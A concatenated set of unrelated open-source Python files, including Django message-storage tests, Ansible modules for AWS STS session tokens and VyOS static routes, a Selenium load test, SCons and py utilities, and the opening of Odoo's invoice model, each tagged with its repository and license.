print >> self.stream, "Reverse the sort order of the profiling report."
def do_sort(self, line):
if not self.stats:
print >> self.stream, "No statistics object is loaded."
return
abbrevs = self.stats.get_sort_arg_defs()
if line and all((x in abbrevs) for x in line.split()):
self.stats.sort_stats(*line.split())
else:
print >> self.stream, "Valid sort keys (unique prefixes are accepted):"
for (key, value) in Stats.sort_arg_dict_default.iteritems():
print >> self.stream, "%s -- %s" % (key, value[1])
return 0
def help_sort(self):
print >> self.stream, "Sort profile data according to specified keys."
print >> self.stream, "(Typing `sort' without arguments lists valid keys.)"
def complete_sort(self, text, *args):
return [a for a in Stats.sort_arg_dict_default if a.startswith(text)]
def do_stats(self, line):
return self.generic('print_stats', line)
def help_stats(self):
print >> self.stream, "Print statistics from the current stat object."
self.generic_help()
def do_strip(self, line):
if self.stats:
self.stats.strip_dirs()
else:
print >> self.stream, "No statistics object is loaded."
def help_strip(self):
print >> self.stream, "Strip leading path information from filenames in the report."
def help_help(self):
print >> self.stream, "Show help for a given command."
def postcmd(self, stop, line):
if stop:
return stop
return None
import sys
if len(sys.argv) > 1:
initprofile = sys.argv[1]
else:
initprofile = None
try:
browser = ProfileBrowser(initprofile)
print >> browser.stream, "Welcome to the profile statistics browser."
browser.cmdloop()
print >> browser.stream, "Goodbye."
except KeyboardInterrupt:
pass
# That's all, folks.
|
apache-2.0
|
tchx84/sugar-toolkit-gtk3
|
examples/ticket2855.py
|
9
|
1630
|
# Copyright (C) 2007, Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
"""
Test the style of toggle and radio buttons inside a palette. The buttons
contains only an icon and should be rendered similarly to the toolbar
controls. Ticket #2855.
"""
from gi.repository import Gtk
from sugar3.graphics.palette import Palette
from sugar3.graphics.icon import Icon
import common
test = common.TestPalette()
palette = Palette('Test radio and toggle')
test.set_palette(palette)
box = Gtk.HBox()
toggle = Gtk.ToggleButton()
icon = Icon(icon_name='go-previous', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
toggle.set_image(icon)
box.pack_start(toggle, False)
toggle.show()
radio = Gtk.RadioButton()
icon = Icon(icon_name='go-next', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
radio.set_image(icon)
radio.set_mode(False)
box.pack_start(radio, False)
radio.show()
palette.set_content(box)
box.show()
if __name__ == '__main__':
common.main(test)
|
lgpl-2.1
|
yati-sagade/RyDyrect
|
django/contrib/messages/tests/fallback.py
|
311
|
6978
|
from django.contrib.messages import constants
from django.contrib.messages.storage.fallback import FallbackStorage, \
CookieStorage
from django.contrib.messages.tests.base import BaseTest
from django.contrib.messages.tests.cookie import set_cookie_data, \
stored_cookie_messages_count
from django.contrib.messages.tests.session import set_session_data, \
stored_session_messages_count
class FallbackTest(BaseTest):
storage_class = FallbackStorage
def get_request(self):
self.session = {}
request = super(FallbackTest, self).get_request()
request.session = self.session
return request
def get_cookie_storage(self, storage):
return storage.storages[-2]
def get_session_storage(self, storage):
return storage.storages[-1]
def stored_cookie_messages_count(self, storage, response):
return stored_cookie_messages_count(self.get_cookie_storage(storage),
response)
def stored_session_messages_count(self, storage, response):
return stored_session_messages_count(self.get_session_storage(storage))
def stored_messages_count(self, storage, response):
"""
Return the storage totals from both cookie and session backends.
"""
total = (self.stored_cookie_messages_count(storage, response) +
self.stored_session_messages_count(storage, response))
return total
def test_get(self):
request = self.get_request()
storage = self.storage_class(request)
cookie_storage = self.get_cookie_storage(storage)
# Set initial cookie data.
example_messages = [str(i) for i in range(5)]
set_cookie_data(cookie_storage, example_messages)
# Overwrite the _get method of the fallback storage to prove it is not
# used (it would cause a TypeError: 'NoneType' object is not callable).
self.get_session_storage(storage)._get = None
# Test that the message actually contains what we expect.
self.assertEqual(list(storage), example_messages)
def test_get_empty(self):
request = self.get_request()
storage = self.storage_class(request)
# Overwrite the _get method of the fallback storage to prove it is not
# used (it would cause a TypeError: 'NoneType' object is not callable).
self.get_session_storage(storage)._get = None
# Test that the message actually contains what we expect.
self.assertEqual(list(storage), [])
def test_get_fallback(self):
request = self.get_request()
storage = self.storage_class(request)
cookie_storage = self.get_cookie_storage(storage)
session_storage = self.get_session_storage(storage)
# Set initial cookie and session data.
example_messages = [str(i) for i in range(5)]
set_cookie_data(cookie_storage, example_messages[:4] +
[CookieStorage.not_finished])
set_session_data(session_storage, example_messages[4:])
# Test that the message actually contains what we expect.
self.assertEqual(list(storage), example_messages)
def test_get_fallback_only(self):
request = self.get_request()
storage = self.storage_class(request)
cookie_storage = self.get_cookie_storage(storage)
session_storage = self.get_session_storage(storage)
# Set initial cookie and session data.
example_messages = [str(i) for i in range(5)]
set_cookie_data(cookie_storage, [CookieStorage.not_finished],
encode_empty=True)
set_session_data(session_storage, example_messages)
# Test that the message actually contains what we expect.
self.assertEqual(list(storage), example_messages)
def test_flush_used_backends(self):
request = self.get_request()
storage = self.storage_class(request)
cookie_storage = self.get_cookie_storage(storage)
session_storage = self.get_session_storage(storage)
# Set initial cookie and session data.
set_cookie_data(cookie_storage, ['cookie', CookieStorage.not_finished])
set_session_data(session_storage, ['session'])
# When updating, previously used but no longer needed backends are
# flushed.
response = self.get_response()
list(storage)
storage.update(response)
session_storing = self.stored_session_messages_count(storage, response)
self.assertEqual(session_storing, 0)
def test_no_fallback(self):
"""
Confirms that:
(1) A short number of messages whose data size doesn't exceed what is
allowed in a cookie will all be stored in the CookieBackend.
(2) If the CookieBackend can store all messages, the SessionBackend
won't be written to at all.
"""
storage = self.get_storage()
response = self.get_response()
# Overwrite the _store method of the fallback storage to prove it isn't
# used (it would cause a TypeError: 'NoneType' object is not callable).
self.get_session_storage(storage)._store = None
for i in range(5):
storage.add(constants.INFO, str(i) * 100)
storage.update(response)
cookie_storing = self.stored_cookie_messages_count(storage, response)
self.assertEqual(cookie_storing, 5)
session_storing = self.stored_session_messages_count(storage, response)
self.assertEqual(session_storing, 0)
def test_session_fallback(self):
"""
Confirms that, if the data exceeds what is allowed in a cookie,
messages which did not fit are stored in the SessionBackend.
"""
storage = self.get_storage()
response = self.get_response()
# see comment in CookieText.test_cookie_max_length
msg_size = int((CookieStorage.max_cookie_size - 54) / 4.5 - 37)
for i in range(5):
storage.add(constants.INFO, str(i) * msg_size)
storage.update(response)
cookie_storing = self.stored_cookie_messages_count(storage, response)
self.assertEqual(cookie_storing, 4)
session_storing = self.stored_session_messages_count(storage, response)
self.assertEqual(session_storing, 1)
def test_session_fallback_only(self):
"""
Confirms that large messages, none of which fit in a cookie, are stored
in the SessionBackend (and nothing is stored in the CookieBackend).
"""
storage = self.get_storage()
response = self.get_response()
storage.add(constants.INFO, 'x' * 5000)
storage.update(response)
cookie_storing = self.stored_cookie_messages_count(storage, response)
self.assertEqual(cookie_storing, 0)
session_storing = self.stored_session_messages_count(storage, response)
self.assertEqual(session_storing, 1)
|
bsd-3-clause
|
privateip/ansible
|
lib/ansible/modules/cloud/amazon/sts_session_token.py
|
48
|
5459
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'committer',
'version': '1.0'}
DOCUMENTATION = '''
---
module: sts_session_token
short_description: Obtain a session token from the AWS Security Token Service
description:
- Obtain a session token from the AWS Security Token Service
version_added: "2.2"
author: Victor Costan (@pwnall)
options:
duration_seconds:
description:
- The duration, in seconds, of the session token. See http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html#API_GetSessionToken_RequestParameters for acceptable and default values.
required: false
default: null
mfa_serial_number:
description:
- The identification number of the MFA device that is associated with the user who is making the GetSessionToken call.
required: false
default: null
mfa_token:
description:
- The value provided by the MFA device, if the trust policy of the user requires MFA.
required: false
default: null
notes:
- In order to use the session token in a following playbook task you must pass the I(access_key), I(access_secret) and I(access_token).
extends_documentation_fragment:
- aws
- ec2
requirements:
- boto3
- botocore
- python >= 2.6
'''
RETURN = """
sts_creds:
description: The Credentials object returned by the AWS Security Token Service
returned: always
type: list
sample:
access_key: ASXXXXXXXXXXXXXXXXXX
expiration: "2016-04-08T11:59:47+00:00"
secret_key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
session_token: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
changed:
description: True if obtaining the credentials succeeds
type: bool
returned: always
"""
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Get a session token (more details: http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html)
sts_session_token:
duration: 3600
register: session_credentials
# Use the session token obtained above to tag an instance in account 123456789012
ec2_tag:
aws_access_key: "{{ session_credentials.sts_creds.access_key }}"
aws_secret_key: "{{ session_credentials.sts_creds.secret_key }}"
security_token: "{{ session_credentials.sts_creds.session_token }}"
resource: i-xyzxyz01
state: present
tags:
MyNewTag: value
'''
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, ec2_argument_spec, get_aws_connection_info
def normalize_credentials(credentials):
access_key = credentials.get('AccessKeyId', None)
secret_key = credentials.get('SecretAccessKey', None)
session_token = credentials.get('SessionToken', None)
expiration = credentials.get('Expiration', None)
return {
'access_key': access_key,
'secret_key': secret_key,
'session_token': session_token,
'expiration': expiration
}
def get_session_token(connection, module):
duration_seconds = module.params.get('duration_seconds')
mfa_serial_number = module.params.get('mfa_serial_number')
mfa_token = module.params.get('mfa_token')
changed = False
args = {}
if duration_seconds is not None:
args['DurationSeconds'] = duration_seconds
if mfa_serial_number is not None:
args['SerialNumber'] = mfa_serial_number
if mfa_token is not None:
args['TokenCode'] = mfa_token
try:
response = connection.get_session_token(**args)
changed = True
except ClientError as e:
module.fail_json(msg=e)
credentials = normalize_credentials(response.get('Credentials', {}))
module.exit_json(changed=changed, sts_creds=credentials)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
duration_seconds = dict(required=False, default=None, type='int'),
mfa_serial_number = dict(required=False, default=None),
mfa_token = dict(required=False, default=None)
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 and botocore are required.')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(module, conn_type='client', resource='sts', region=region, endpoint=ec2_url, **aws_connect_kwargs)
else:
module.fail_json(msg="region must be specified")
get_session_token(connection, module)
if __name__ == '__main__':
main()
|
gpl-3.0
|
lesiavl/selenium_perfomance_tests
|
utender_load/create_tender.py
|
4
|
2484
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from selenium import webdriver
from page_objects import *
from datetime import datetime
import unittest
import argparse
tender_id = None
class SeleniumMixin(unittest.TestCase):
def assertlementIsPresentById(self, elem_id):
try:
self.driver.find_element_by_id(elem_id)
except NoSuchElementException as error:
self.fail(error)
class TestCreateTender(SeleniumMixin):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.get(broker['url'])
self.driver.set_window_size(1200, 1000)
self.login_page_owner = LoginPage(
owner_users['email'], owner_users['password'], self.driver
)
self.create_tender_page = CreateTenderPage(self.driver)
self.find_tender = FindTenderPage(self.driver)
def test_create_tender(self):
self.login_page_owner.login_as_owner()
self.driver.get(create_tender_url)
self.create_tender_page.create_tender()
is_found = False
for i in range(1, 10):
try:
given_tender_id = self.find_tender.get_tender_id()
print given_tender_id
if given_tender_id:
with open('load_results_create.txt', 'a') as f:
f.write(
'Tender_Owner created tender with {}, finished at {} ------------------ PASSED\n'.format(
given_tender_id, datetime.now())
)
f.close()
is_found = True
break
except NoSuchElementException or UnicodeEncodeError:
sleep(30)
self.driver.refresh()
self.driver.execute_script("window.scrollTo(0, 1582);")
if not is_found:
with open('load_results_create.txt', 'a') as f:
f.write('Tender_Owner did NOT create tender, finished at {} ------------ FAILED\n'.format(
datetime.now())
)
f.close()
return False
def tearDown(self):
self.driver.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='create_tender')
suite = unittest.TestSuite()
suite.addTest(TestCreateTender("test_create_tender"))
runner = unittest.TextTestRunner()
runner.run(suite)
|
apache-2.0
|
chriskmanx/qmole
|
QMOLEDEV/node/tools/scons/scons-local-1.2.0/SCons/Tool/icl.py
|
12
|
1840
|
"""engine.SCons.Tool.icl
Tool-specific initialization for the Intel C/C++ compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/icl.py 3842 2008/12/20 22:59:52 scons"
import SCons.Tool.intelc
# This has been completely superceded by intelc.py, which can
# handle both Windows and Linux versions.
def generate(*args, **kw):
"""Add Builders and construction variables for icl to an Environment."""
return apply(SCons.Tool.intelc.generate, args, kw)
def exists(*args, **kw):
return apply(SCons.Tool.intelc.exists, args, kw)
|
gpl-3.0
|
benthomasson/ansible
|
lib/ansible/modules/network/vyos/vyos_static_route.py
|
11
|
7392
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
#
# This file is part of Ansible by Red Hat
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: vyos_static_route
version_added: "2.4"
author: "Trishna Guha (@trishnag)"
short_description: Manage static IP routes on Cisco VyOS network devices
description:
- This module provides declarative management of static
IP routes on Vyatta VyOS network devices.
options:
prefix:
description:
- Network prefix of the static route.
C(mask) param should be ignored if C(prefix) is provided
with C(mask) value C(prefix/mask).
mask:
description:
- Network prefix mask of the static route.
next_hop:
description:
- Next hop IP of the static route.
admin_distance:
description:
- Admin distance of the static route.
aggregate:
description: List of static route definitions
purge:
description:
- Purge static routes not defined in the aggregates parameter.
default: no
state:
description:
- State of the static route configuration.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: configure static route
vyos_static_route:
prefix: 192.168.2.0
mask: 24
next_hop: 10.0.0.1
- name: configure static route prefix/mask
vyos_static_route:
prefix: 192.168.2.0/16
next_hop: 10.0.0.1
- name: remove configuration
vyos_static_route:
prefix: 192.168.2.0
mask: 16
next_hop: 10.0.0.1
state: absent
- name: configure aggregates of static routes
vyos_static_route:
aggregate:
- { prefix: 192.168.2.0, mask: 24, next_hop: 10.0.0.1 }
- { prefix: 192.168.3.0, mask: 16, next_hop: 10.0.2.1 }
- { prefix: 192.168.3.0/16, next_hop: 10.0.2.1 }
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set protocols static route 192.168.2.0/16 next-hop 10.0.0.1
"""
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vyos import get_config, load_config
from ansible.module_utils.vyos import vyos_argument_spec, check_args
def spec_to_commands(updates, module):
commands = list()
want, have = updates
for w in want:
prefix = w['prefix']
mask = w['mask']
next_hop = w['next_hop']
admin_distance = w['admin_distance']
state = w['state']
del w['state']
if state == 'absent' and w in have:
commands.append('delete protocols static route %s/%s' % (prefix, mask))
elif state == 'present' and w not in have:
cmd = 'set protocols static route %s/%s next-hop %s' % (prefix, mask, next_hop)
if admin_distance != 'None':
cmd += ' distance %s' % (admin_distance)
commands.append(cmd)
return commands
def config_to_dict(module):
data = get_config(module)
obj = []
for line in data.split('\n'):
if line.startswith('set protocols static route'):
match = re.search(r'static route (\S+)', line, re.M)
prefix = match.group(1).split('/')[0]
mask = match.group(1).split('/')[1]
if 'next-hop' in line:
match_hop = re.search(r'next-hop (\S+)', line, re.M)
next_hop = match_hop.group(1).strip("'")
match_distance = re.search(r'distance (\S+)', line, re.M)
if match_distance is not None:
admin_distance = match_distance.group(1)[1:-1]
else:
admin_distance = None
if admin_distance is not None:
obj.append({'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': admin_distance})
else:
obj.append({'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': 'None'})
return obj
def map_params_to_obj(module):
obj = []
if 'aggregate' in module.params and module.params['aggregate']:
for c in module.params['aggregate']:
d = c.copy()
if '/' in d['prefix']:
d['mask'] = d['prefix'].split('/')[1]
d['prefix'] = d['prefix'].split('/')[0]
if 'state' not in d:
d['state'] = module.params['state']
if 'admin_distance' not in d:
d['admin_distance'] = str(module.params['admin_distance'])
obj.append(d)
else:
prefix = module.params['prefix'].strip()
if '/' in prefix:
mask = prefix.split('/')[1]
prefix = prefix.split('/')[0]
else:
mask = module.params['mask'].strip()
next_hop = module.params['next_hop'].strip()
admin_distance = str(module.params['admin_distance'])
state = module.params['state']
obj.append({
'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': admin_distance,
'state': state
})
return obj
def main():
""" main entry point for module execution
"""
argument_spec = dict(
prefix=dict(type='str'),
mask=dict(type='str'),
next_hop=dict(type='str'),
admin_distance=dict(type='int'),
aggregate=dict(type='list'),
purge=dict(type='bool'),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(vyos_argument_spec)
required_one_of = [['aggregate', 'prefix']]
required_together = [['prefix', 'next_hop']]
mutually_exclusive = [['aggregate', 'prefix']]
module = AnsibleModule(argument_spec=argument_spec,
required_one_of=required_one_of,
required_together=required_together,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = config_to_dict(module)
commands = spec_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
load_config(module, commands, commit=commit)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
zploskey/servo
|
tests/wpt/web-platform-tests/tools/py/py/_path/cacheutil.py
|
278
|
3333
|
"""
This module contains multithread-safe cache implementations.
All Caches have
getorbuild(key, builder)
delentry(key)
methods and allow configuration when instantiating the cache class.
"""
from time import time as gettime
class BasicCache(object):
def __init__(self, maxentries=128):
self.maxentries = maxentries
self.prunenum = int(maxentries - maxentries/8)
self._dict = {}
def clear(self):
self._dict.clear()
def _getentry(self, key):
return self._dict[key]
def _putentry(self, key, entry):
self._prunelowestweight()
self._dict[key] = entry
def delentry(self, key, raising=False):
try:
del self._dict[key]
except KeyError:
if raising:
raise
def getorbuild(self, key, builder):
try:
entry = self._getentry(key)
except KeyError:
entry = self._build(key, builder)
self._putentry(key, entry)
return entry.value
def _prunelowestweight(self):
""" prune out entries with lowest weight. """
numentries = len(self._dict)
if numentries >= self.maxentries:
# evict according to entry's weight
items = [(entry.weight, key)
for key, entry in self._dict.items()]
items.sort()
index = numentries - self.prunenum
if index > 0:
for weight, key in items[:index]:
# in MT situations the element might be gone
self.delentry(key, raising=False)
class BuildcostAccessCache(BasicCache):
""" A BuildTime/Access-counting cache implementation.
the weight of a value is computed as the product of
num-accesses-of-a-value * time-to-build-the-value
The values with the least such weights are evicted
if the cache maxentries threshold is superceded.
For implementation flexibility more than one object
might be evicted at a time.
"""
# time function to use for measuring build-times
def _build(self, key, builder):
start = gettime()
val = builder()
end = gettime()
return WeightedCountingEntry(val, end-start)
class WeightedCountingEntry(object):
def __init__(self, value, oneweight):
self._value = value
self.weight = self._oneweight = oneweight
def value(self):
self.weight += self._oneweight
return self._value
value = property(value)
class AgingCache(BasicCache):
""" This cache prunes out cache entries that are too old.
"""
def __init__(self, maxentries=128, maxseconds=10.0):
super(AgingCache, self).__init__(maxentries)
self.maxseconds = maxseconds
def _getentry(self, key):
entry = self._dict[key]
if entry.isexpired():
self.delentry(key)
raise KeyError(key)
return entry
def _build(self, key, builder):
val = builder()
entry = AgingEntry(val, gettime() + self.maxseconds)
return entry
class AgingEntry(object):
def __init__(self, value, expirationtime):
self.value = value
self.weight = expirationtime
def isexpired(self):
t = gettime()
return t >= self.weight
|
mpl-2.0
|
SCSSG/Odoo-SCS
|
addons/account/account_invoice.py
|
3
|
79288
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import itertools
from lxml import etree
from openerp import models, fields, api, _
from openerp.exceptions import except_orm, Warning, RedirectWarning
from openerp.tools import float_compare
import openerp.addons.decimal_precision as dp
# mapping invoice type to journal type
TYPE2JOURNAL = {
'out_invoice': 'sale',
'in_invoice': 'purchase',
'out_refund': 'sale_refund',
'in_refund': 'purchase_refund',
}
# mapping invoice type to refund type
TYPE2REFUND = {
'out_invoice': 'out_refund', # Customer Invoice
'in_invoice': 'in_refund', # Supplier Invoice
'out_refund': 'out_invoice', # Customer Refund
'in_refund': 'in_invoice', # Supplier Refund
}
MAGIC_COLUMNS = ('id', 'create_uid', 'create_date', 'write_uid', 'write_date')
class account_invoice(models.Model):
_name = "account.invoice"
_inherit = ['mail.thread']
_description = "Invoice"
_order = "number desc, id desc"
_track = {
'type': {
},
'state': {
'account.mt_invoice_paid': lambda self, cr, uid, obj, ctx=None: obj.state == 'paid' and obj.type in ('out_invoice', 'out_refund'),
'account.mt_invoice_validated': lambda self, cr, uid, obj, ctx=None: obj.state == 'open' and obj.type in ('out_invoice', 'out_refund'),
},
}
@api.one
@api.depends('invoice_line.price_subtotal', 'tax_line.amount')
def _compute_amount(self):
self.amount_untaxed = sum(line.price_subtotal for line in self.invoice_line)
self.amount_tax = sum(line.amount for line in self.tax_line)
self.amount_total = self.amount_untaxed + self.amount_tax
@api.model
def _default_journal(self):
inv_type = self._context.get('type', 'out_invoice')
inv_types = inv_type if isinstance(inv_type, list) else [inv_type]
company_id = self._context.get('company_id', self.env.user.company_id.id)
domain = [
('type', 'in', filter(None, map(TYPE2JOURNAL.get, inv_types))),
('company_id', '=', company_id),
]
return self.env['account.journal'].search(domain, limit=1)
@api.model
def _default_currency(self):
journal = self._default_journal()
return journal.currency or journal.company_id.currency_id
@api.model
@api.returns('account.analytic.journal', lambda r: r.id)
def _get_journal_analytic(self, inv_type):
""" Return the analytic journal corresponding to the given invoice type. """
type2journal = {'out_invoice': 'sale', 'in_invoice': 'purchase', 'out_refund': 'sale', 'in_refund': 'purchase'}
journal_type = type2journal.get(inv_type, 'sale')
journal = self.env['account.analytic.journal'].search([('type', '=', journal_type)], limit=1)
if not journal:
raise except_orm(_('No Analytic Journal!'),
_("You must define an analytic journal of type '%s'!") % (journal_type,))
return journal[0]
@api.one
@api.depends('account_id', 'move_id.line_id.account_id', 'move_id.line_id.reconcile_id')
def _compute_reconciled(self):
self.reconciled = self.test_paid()
@api.model
def _get_reference_type(self):
return [('none', _('Free Reference'))]
@api.one
@api.depends(
'state', 'currency_id', 'invoice_line.price_subtotal',
'move_id.line_id.account_id.type',
'move_id.line_id.amount_residual',
# Fixes the fact that move_id.line_id.amount_residual, being not stored and old API, doesn't trigger recomputation
'move_id.line_id.reconcile_id',
'move_id.line_id.amount_residual_currency',
'move_id.line_id.currency_id',
'move_id.line_id.reconcile_partial_id.line_partial_ids.invoice.type',
)
# An invoice's residual amount is the sum of its unreconciled move lines and,
# for partially reconciled move lines, their residual amount divided by the
# number of times this reconciliation is used in an invoice (so we split
# the residual amount between all invoice)
def _compute_residual(self):
self.residual = 0.0
# Each partial reconciliation is considered only once for each invoice it appears into,
# and its residual amount is divided by this number of invoices
partial_reconciliations_done = []
for line in self.sudo().move_id.line_id:
if line.account_id.type not in ('receivable', 'payable'):
continue
if line.reconcile_partial_id and line.reconcile_partial_id.id in partial_reconciliations_done:
continue
# Get the correct line residual amount
if line.currency_id == self.currency_id:
line_amount = line.amount_residual_currency if line.currency_id else line.amount_residual
else:
from_currency = line.company_id.currency_id.with_context(date=line.date)
line_amount = from_currency.compute(line.amount_residual, self.currency_id)
# For partially reconciled lines, split the residual amount
if line.reconcile_partial_id:
partial_reconciliation_invoices = set()
for pline in line.reconcile_partial_id.line_partial_ids:
if pline.invoice and self.type == pline.invoice.type:
partial_reconciliation_invoices.update([pline.invoice.id])
line_amount = self.currency_id.round(line_amount / len(partial_reconciliation_invoices))
partial_reconciliations_done.append(line.reconcile_partial_id.id)
self.residual += line_amount
self.residual = max(self.residual, 0.0)
@api.one
@api.depends(
'move_id.line_id.account_id',
'move_id.line_id.reconcile_id.line_id',
'move_id.line_id.reconcile_partial_id.line_partial_ids',
)
def _compute_move_lines(self):
# Give Journal Items related to the payment reconciled to this invoice.
# Return partial and total payments related to the selected invoice.
self.move_lines = self.env['account.move.line']
if not self.move_id:
return
data_lines = self.move_id.line_id.filtered(lambda l: l.account_id == self.account_id)
partial_lines = self.env['account.move.line']
for data_line in data_lines:
if data_line.reconcile_id:
lines = data_line.reconcile_id.line_id
elif data_line.reconcile_partial_id:
lines = data_line.reconcile_partial_id.line_partial_ids
else:
lines = self.env['account.move.line']
partial_lines += data_line
self.move_lines = lines - partial_lines
@api.one
@api.depends(
'move_id.line_id.reconcile_id.line_id',
'move_id.line_id.reconcile_partial_id.line_partial_ids',
)
def _compute_payments(self):
partial_lines = lines = self.env['account.move.line']
for line in self.move_id.line_id:
if line.account_id != self.account_id:
continue
if line.reconcile_id:
lines |= line.reconcile_id.line_id
elif line.reconcile_partial_id:
lines |= line.reconcile_partial_id.line_partial_ids
partial_lines += line
self.payment_ids = (lines - partial_lines).sorted()
name = fields.Char(string='Reference/Description', index=True,
readonly=True, states={'draft': [('readonly', False)]})
origin = fields.Char(string='Source Document',
help="Reference of the document that produced this invoice.",
readonly=True, states={'draft': [('readonly', False)]})
supplier_invoice_number = fields.Char(string='Supplier Invoice Number',
help="The reference of this invoice as provided by the supplier.",
readonly=True, states={'draft': [('readonly', False)]})
type = fields.Selection([
('out_invoice','Customer Invoice'),
('in_invoice','Supplier Invoice'),
('out_refund','Customer Refund'),
('in_refund','Supplier Refund'),
], string='Type', readonly=True, index=True, change_default=True,
default=lambda self: self._context.get('type', 'out_invoice'),
track_visibility='always')
number = fields.Char(related='move_id.name', store=True, readonly=True, copy=False)
internal_number = fields.Char(string='Invoice Number', readonly=True,
default=False, copy=False,
help="Unique number of the invoice, computed automatically when the invoice is created.")
reference = fields.Char(string='Invoice Reference',
help="The partner reference of this invoice.")
reference_type = fields.Selection('_get_reference_type', string='Payment Reference',
required=True, readonly=True, states={'draft': [('readonly', False)]},
default='none')
comment = fields.Text('Additional Information')
state = fields.Selection([
('draft','Draft'),
('proforma','Pro-forma'),
('proforma2','Pro-forma'),
('open','Open'),
('paid','Paid'),
('cancel','Cancelled'),
], string='Status', index=True, readonly=True, default='draft',
track_visibility='onchange', copy=False,
help=" * The 'Draft' status is used when a user is encoding a new and unconfirmed Invoice.\n"
" * The 'Pro-forma' when invoice is in Pro-forma status,invoice does not have an invoice number.\n"
" * The 'Open' status is used when user create invoice,a invoice number is generated.Its in open status till user does not pay invoice.\n"
" * The 'Paid' status is set automatically when the invoice is paid. Its related journal entries may or may not be reconciled.\n"
